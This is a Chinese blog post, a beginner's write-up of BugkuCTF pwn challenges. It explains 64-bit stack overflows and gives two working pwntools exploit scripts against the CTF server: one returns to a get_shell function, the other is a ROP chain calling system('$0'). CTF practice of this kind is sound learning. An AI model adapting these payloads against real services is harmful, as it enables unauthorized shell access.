唉,觉得自己TCL,栈溢出知识点差不多都会了,可是题目做不出来啊啊啊啊!缺少锻炼吧,这两天把BugkuCTF上面的pwn题做一下吧。。。
pwn1
只给了连接
第一次,才50分,想来不会太难,连上去
果然,连接就能拿flag
pwn2
一道非常基础的栈溢出。。。把返回函数地址填错了,结果搞了好久。。
64位的程序
什么保护也没开
拖进ida里面看一下
s在rbp-30h,所以需要覆盖的长度就是0x30+0x8
利用的函数,查找一下字符串
找到对应的函数
对应的地址为:0x400751
接着就可以写exp了:
#coding=utf-8
from pwn import *
p = remote('114.116.54.89',10003)#远程连接到题目给的端口
sys_addr = 0x400751#
p.recvuntil("?")#接受到?
payload = 0x38*'a'+p64(sys_addr)
p.sendline(payload)#将我们构造好的payload发送过去
p.interactive()
运行结果如下:
【注:程序中有system函数,但不是调用它,因为参数,我们要找参数已经传入的get_shell函数】
pwn4
这些都和pwn2的一样
程序中没有‘/bin/sh’字符串
但是有system函数
拖进ida,查看main函数
很明显的栈溢出,覆盖量为0x10+0x8=0x18
那接下来怎么办呢?8会。。。
参考大佬博客,发现‘/bin/sh’可以可以用‘$0’来代替
搜索字符串,找到
可以从0x601100开始往后数数,也可以从0x601122往前数,$是占两 字节,别的一个字节,可以得到'$0'的地址是0x601122-0x3=0x60111f
因为64位的程序,只有一个参数的system函数,它的参数保存在rdi中,所以,我们要先找一个pop rdi
然后构造 覆盖量 + pop rdi + 参数 + system地址
这样,pop rdi的时候,就可以把参数放入rdi中了,然后,system覆盖返回地址,get shell
exp如下:
from pwn import *
p = remote('114.116.54.89',10004)
sys_addr = 0x400570
binsh_addr = 0x60111f
pop_rdi = 0x04007d3
p.recvuntil("Come on,try to pwn me")
payload = 0x18*'a'+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
p.sendline(payload)
p.interactive()
执行效果:
【注意程序是32位和64位参数的不一样,32位是将参数压入栈中的,而64位是将参数放在寄存器中保管的】
小白一开始想把参数传入栈内,然后将地址拿过来用,结果不行。。。纳闷了好久。。。
emm,不知道啥时候写的,草稿箱里的,,,
BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】_橘小白的博客-CSDN博客_bugkuctf pwn